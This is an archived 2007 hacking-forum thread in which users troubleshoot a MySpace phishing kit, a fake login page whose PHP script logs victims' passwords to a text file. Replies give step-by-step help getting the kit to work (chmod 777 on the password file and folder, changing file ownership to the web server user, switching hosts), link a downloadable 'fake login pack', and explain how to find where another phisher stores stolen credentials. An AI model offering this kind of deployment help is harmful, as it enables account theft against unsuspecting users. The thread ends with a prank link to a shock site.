PDA

View Full Version : Myspace.txt issue - password stealing dealeo



Tetzuro
10-06-2007, 08:28 PM
hey people im new to the forums but trust me im not here to start noob train of "omg i wanna hack my gf's myspace" i just need a quick tip in the right direction, ive been fiddleing with the bestone.zip file that dipman44 posted up on his myspace profile hacking thread, i uploaded it to my server and wanted to see if i could hack my dummy profile i have on myspace, i went directly to the index.php link i have hosted up and put in my log in info and it took me to my home screen, from there i was assuming it worked but when i checked my .txt file there was nothing there, do i have to set something on the CHMOD of either file?

anyhelp would do, thx

warbeak1245
10-06-2007, 11:06 PM
yeah, chmod 777 it, otherwise it has no permissions to change it.

Tetzuro
10-07-2007, 04:01 PM
ok i went to my index.php file and under the CHMOD permissions i put 777, saved it and tryed to test again and i still dont get anything thing saved on the txt file, i went through my ftp client log (flashfxp) and it says the the permission command 777 was not understood...weird...anyone know whats up :confused:

dipman44
10-11-2007, 11:37 PM
well im guessing that your host has maybe figured out the php code that is used in myspace fake logins and blocked it with some kind of script or your host does not allow php. if you can get that host your using to work try http://www.newsit.es/

i think they may work

Ezekiel
10-12-2007, 02:49 PM
You need to set permissions to 777 on:


whatever.txt (where passwords are written)
the directory all the files are in


For example, you have login.html, process.php and passwords.txt in a directory named 'myspace'. You would chmod passwords.txt and the actual 'myspace' directory to 777 (read, write, execute for owner, group and everyone else).

A safer way to do this would probably be to chown them to whatever the web-server is running as (e.g. www-data) and similarly chgrp them to www-data (or, as said before, whatever group the server is part of).

My advice of setting permissions to 777 works because it allows every user to read, write and execute the files. Not really secure for shared hosting, but that shouldn't be a problem.

The directory itself needs execute permissions (included in the 777 chmod) to create new files and/or write to them, or something. I'm not an expert on permissions, but that's my best guess.

Try my fake login pack (http://www.exoteric.ws/uploads/myspace_login.tar.gz) instead, and see how that turns out for you. Instructions are included in the archive, and if you follow them, it should work perfectly.

If none of the above works, your web server is probably causing problems somehow and there's not much we can advise you to do apart from moving web-host. If they're interfering with your scripts and preventing certain functions, there's nothing we can do.

doppelgangster
10-14-2007, 06:27 PM
I got the source code for a fake login screen for myspace, what I'm trying to find is where the original poster is logging the passwords. Is there a way to find that?

Ezekiel
10-15-2007, 04:13 AM
If you're talking about going view -> source and saving that, no, the location of saved passwords probably wouldn't be contained in there.

If you had the source code to the PHP (or whatever other language) script used to process the stolen info, then you could easily find the location. For example, if they're saving passwords to file, you could simply search for 'fopen'.

Which is it to be?

doppelgangster
10-16-2007, 01:32 AM
I simply followed the link to the fake page and viewed source. Eh, I'm such a n00b. Please excuse my ignorance. I suppose I'm out of luck finding the source code for the php language used. Thanks Mike*5*.

adrenalinehype
10-19-2007, 07:48 PM
Hey where can i donwload the bestone.zip

~~smart~fool~~
10-19-2007, 08:59 PM
bestone.zip (http://meatspin.com)